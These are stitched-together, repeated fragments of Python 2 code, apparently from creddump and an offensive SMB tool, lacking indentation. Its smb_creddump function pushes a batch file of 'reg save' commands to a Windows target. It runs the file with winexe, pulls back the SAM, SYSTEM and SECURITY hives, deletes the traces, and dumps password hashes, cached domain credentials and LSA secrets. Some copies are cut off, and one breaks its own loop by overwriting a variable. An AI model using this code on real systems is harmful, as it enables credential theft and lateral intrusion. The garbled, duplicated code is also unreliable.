print "%s /path/to/System32/SYSTEM /path/to/System32/config/SECURITY false" % sys.argv[
0]
def dump(src, length=8):
N = 0
result = ''
while src:
s, src = src[:length], src[length:]
hexa = ' '.join(["%02X" % ord(x) for x in s])
s = s.translate(FILTER)
result += "%04X %-*s %s\n" % (N, length * 3, hexa, s)
N += length
return result
if len(sys.argv) < 4 or sys.argv[3] not in ["true", "false"]:
showUsage()
sys.exit(1)
else:
vista = True if sys.argv[3] == "true" else False
secrets = get_file_secrets(sys.argv[1], sys.argv[2])
if not secrets:
print "Unable to read LSA secrets. Perhaps you provided invalid hive files?"
sys.exit(1)
for k in secrets:
print k
print dump(secrets[k], length=16)
print "\nExample (Windows Vista/7):"
print "%s /path/to/System32/config/SYSTEM /path/to/System32/config/SECURITY true" % sys.argv[0]
print "\nExample (Windows XP):"
print "%s /path/to/System32/SYSTEM /path/to/System32/config/SECURITY false" % sys.argv[0]
def dump(src, length=8):
N=0; result=''
while src:
s,src = src[:length],src[length:]
hexa = ' '.join(["%02X"%ord(x) for x in s])
s = s.translate(FILTER)
result += "%04X %-*s %s\n" % (N, length*3, hexa, s)
N+=length
return result
if len(sys.argv) < 4 or sys.argv[3] not in ["true", "false"]:
showUsage()
sys.exit(1)
else:
vista = True if sys.argv[3] == "true" else False
secrets = get_file_secrets(sys.argv[1], sys.argv[2])
if not secrets:
print "Unable to read LSA secrets. Perhaps you provided invalid hive files?"
sys.exit(1)
for k in secrets:
print k
print dump(secrets[k], length=16)
def smb_creddump():
"""
[-s] <ip> [ user ] [ passwd/nthash ]
Extract SAM, SECURITY, SYSTEM hives and dump SAM, DCC, LSA Secrets
"""
try:
sys.path.insert(0, BASEDIR + '/creddump')
from framework.win32 import hashdump, domcachedump, lsasecrets
except:
text("[!] Error: Creddump dependency missing.", 1)
set_creds(3)
text("[*] Extracting hives...")
tmpfile = '/tmp/cred_run.bat'
bat = ['@echo off', 'cd \\windows\\temp',
'reg save HKLM\\SAM sam.hive /y',
'reg save HKLM\\SYSTEM system.hive /y',
'reg save HKLM\\SECURITY security.hive /y']
open(tmpfile, 'w').write('\r\n'.join(bat))
smbclient('put "%s" "\\windows\\temp\\cred_run.bat"' % tmpfile)
print winexe('\\windows\\temp\\cred_run.bat')
text("[*] Downloading hives...")
smbclient('get "\\windows\\temp\\sam.hive" "%s_sam.hive"' % CONF['smb_ip'])
smbclient('get "\\windows\\temp\\system.hive" "%s_system.hive"' % CONF['smb_ip'])
smbclient('get "\\windows\\temp\\security.hive" "%s_security.hive"' % CONF['smb_ip'])
text("[*] Removing temp files...")
smbclient('del "\\windows\\temp\\cred_run.bat"')
smbclient('del "\\windows\\temp\\sam.hive"')
smbclient('del "\\windows\\temp\\system.hive"')
smbclient('del "\\windows\\temp\\security.hive"')
os.unlink(tmpfile)
text("[*] Extracting SAM credentials...")
hashdump.dump_file_hashes(CONF['smb_ip'] + '_system.hive', CONF['smb_ip'] + '_sam.hive')
text("[*] Extracting MSCASH credentials...")
domcachedump.dump_file_hashes(CONF['smb_ip'] + '_system.hive', CONF['smb_ip'] + '_security.hive')
# Code below ripped from creddump's lsadump.py
text("[*] Extracting LSA Secrets...")
try:
FILTER = ''.join([(len(repr(chr(x)))==3) and chr(x) or '.' for x in range(256)])
secrets = lsasecrets.get_file_secrets(CONF['smb_ip'] + '_system.hive', CONF['smb_ip'] + '_security.hive')
if not secrets:
text("[!] Unable to read LSA secrets.")
else:
for k in secrets:
N = 0
length = 16
result = ''
while secrets[k]:
s, secrets[k] = secrets[k][:length],secrets[k][length:]
hexa = ' '.join(["%02X" % ord(x) for x in s])
s = s.translate(FILTER)
result += "%04X %-*s %s\n" % (N, length*3, hexa, s)
N += length
print k
print result
except:
pass
text("[*] SYSTEM, SAM and SECURITY hives were saved in the current directory.")
from framework.win32.lsasecrets import get_file_secrets
# Hex dump code from
# http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/142812
FILTER=''.join([(len(repr(chr(x)))==3) and chr(x) or '.' for x in range(256)])
def dump(src, length=8):
N=0; result=''
while src:
s,src = src[:length],src[length:]
hexa = ' '.join(["%02X"%ord(x) for x in s])
s = s.translate(FILTER)
result += "%04X %-*s %s\n" % (N, length*3, hexa, s)
N+=length
return result
if len(sys.argv) < 3:
print "usage: %s Bootkey <security hive>" % sys.argv[0]
sys.exit(1)
secrets = get_file_secrets(sys.argv[1].decode("hex"), sys.argv[2])
if not secrets:
print "Unable to read LSA secrets. Perhaps you provided invalid hive files?"
sys.exit(1)
for k in secrets:
print k
print dump(secrets[k], length=16)
# http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/142812
FILTER = ''.join([(len(repr(chr(x))) == 3) and chr(x) or '.'
for x in range(256)])
def dump(src, length=8):
N = 0
result = ''
while src:
s, src = src[:length], src[length:]
hexa = ' '.join(["%02X" % ord(x) for x in s])
s = s.translate(FILTER)
result += "%04X %-*s %s\n" % (N, length * 3, hexa, s)
N += length
return result
if len(sys.argv) < 3:
print "usage: %s Bootkey <security hive>" % sys.argv[0]
sys.exit(1)
secrets = get_file_secrets(sys.argv[1].decode("hex"), sys.argv[2])
if not secrets:
print "Unable to read LSA secrets. Perhaps you provided invalid hive files?"
sys.exit(1)
for k in secrets:
print k
print dump(secrets[k], length=16)
def smb_creddump():
"""
[-s] <ip/file/range> [ user ] [ passwd/nthash ]
Extract SAM, SECURITY, SYSTEM hives and dump SAM, DCC, LSA Secrets
"""
try:
sys.path.insert(0, BASEDIR + '/creddump')
from framework.win32 import hashdump, domcachedump, lsasecrets
except:
text("[!] Error: Creddump dependency missing.", 1)
set_creds(3)
text("[*] %s Extracting hives..." % (CONF["smb_ip"]))
tmpfile = '/tmp/cred_run.%s.bat' % (CONF["smb_ip"])
bat = [
'@echo off', 'cd \\windows\\temp', 'reg save HKLM\\SAM sam.hive /y',
'reg save HKLM\\SYSTEM system.hive /y',
'reg save HKLM\\SECURITY security.hive /y'
]
open(tmpfile, 'w').write('\r\n'.join(bat))
smbclient('put "%s" "\\windows\\temp\\cred_run.bat"' % tmpfile)
text("[*] %s Running cred_run.bat\n%s\n" %
(CONF["smb_ip"], winexe('\\windows\\temp\\cred_run.bat')))
text("[*] %s Downloading hives..." % (CONF["smb_ip"]))
smbclient('get "\\windows\\temp\\sam.hive" "%s_sam.hive"' % CONF['smb_ip'])
smbclient('get "\\windows\\temp\\system.hive" "%s_system.hive"' %
CONF['smb_ip'])
smbclient('get "\\windows\\temp\\security.hive" "%s_security.hive"' %
CONF['smb_ip'])
text("[*] %s Removing temp files..." % (CONF["smb_ip"]))
smbclient('del "\\windows\\temp\\cred_run.bat"')
smbclient('del "\\windows\\temp\\sam.hive"')
smbclient('del "\\windows\\temp\\system.hive"')
smbclient('del "\\windows\\temp\\security.hive"')
os.unlink(tmpfile)
text("[*] %s Extracting SAM credentials..." % (CONF["smb_ip"]))
hashes = hashdump.dump_file_hashes(CONF['smb_ip'] + '_system.hive',
CONF['smb_ip'] + '_sam.hive')
text("[*] %s Extracting MSCASH credentials..." % (CONF["smb_ip"]))
mscash = domcachedump.dump_file_hashes(CONF['smb_ip'] + '_system.hive',
CONF['smb_ip'] + '_security.hive')
text("[*] %s SAM hashes\n%s" % (CONF["smb_ip"], "\n".join(hashes)))
text("[*] %s MsCash\n%s" % (CONF["smb_ip"], "\n".join(mscash)))
# Code below ripped from creddump's lsadump.py
text("[*] %s Extracting LSA Secrets..." % (CONF["smb_ip"]))
try:
FILTER = ''.join([(len(repr(chr(x))) == 3) and chr(x) or '.'
for x in range(256)])
secrets = lsasecrets.get_file_secrets(
CONF['smb_ip'] + '_system.hive', CONF['smb_ip'] + '_security.hive')
if not secrets:
text("[!] %s Error(smb_creddump): Unable to read LSA secrets." %
(CONF["smb_ip"]))
else:
secrets = []
for k in secrets:
N = 0
length = 16
result = ''
while secrets[k]:
s, secrets[k] = secrets[k][:length], secrets[k][length:]
hexa = ' '.join(["%02X" % ord(x) for x in s])
s = s.translate(FILTER)
result += "%04X %-*s %s\n" % (N, length * 3, hexa, s)
N += length
secrets.append(k)
secrets.append(result)
text("[*] %s LSA Secrets\n%s" %
(CONF["smb_ip"], "\n".join(secrets)))
except:
pass
text(
"[*] %s SYSTEM, SAM and SECURITY hives were saved in the current directory."
% (CONF["smb_ip"]))